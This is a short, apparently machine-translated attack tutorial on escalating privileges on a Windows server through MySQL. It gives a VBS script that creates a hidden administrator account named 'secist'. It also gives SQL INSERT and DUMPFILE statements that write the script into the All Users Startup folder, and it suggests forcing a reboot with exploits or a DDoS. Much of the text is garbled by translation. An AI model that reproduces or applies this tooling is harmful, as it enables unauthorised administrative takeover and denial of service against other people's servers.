MySQL Startup Item Right

About MySQL startup item, listen to its name and know its meaning. is to import a VBS script into C:\Documents and Settings\All users\"Start menu \ program \ startup, if the administrator restarts the server, then it will automatically invoke the script, and execute the user add and Power command!

Here are two ways of thinking:

1. If C:\Documents and Settings\All users\"Start menu \ program \ startup directory has read and write permissions, then we can directly upload the VBS script to the directory!

The VBS right script code is as follows:

Setwsnetwork=createobject ("Wscript.Network")
os= "winnt://" &wsnetwork.computername
Set ob=getobject (OS)
Setoe=getobject (os& "/administrators,group")
Set Od=ob. Create ("User", "secist")
Od. SetPassword "Secist.com"
Od. SetInfo
Set of=getobject (os& "/secist", user)
Oe.add os& "/secist"

Save the above code as a file upload with a. vbs suffix!

2. Use the SQL command to create and add VBS scripts through the MySQL execution function of the horse.

CREATE TABLE secist (cmd text);

INSERT into secist values ("Set Wshshell=createobject (" "Wscript.Shell" ")");

INSERT into secist values ("A=wshshell.run (" "cmd.exe/c net user secist secist.com/add" ", 0)");

INSERT into secist values ("B=wshshell.run (" "cmd.exe/c net localgroup Administrators Secist/add" ", 0)");

SELECT * from Secist to DumpFile "C:\Documents and Settings\All users\" Start "menu \ Program \ start \secist.vbs";

After the successful execution of the above command, as long as the administrator restarted the server, we can successfully raise the power!

Warm tips:

1. About restarting the target server, we can take advantage of some exp, or DDoS denial service, that can cause a blue screen on the server!

2. The uploaded directory must have read and Write permission!

3. The called CMD must also have sufficient permissions!

MySQL Startup Item Right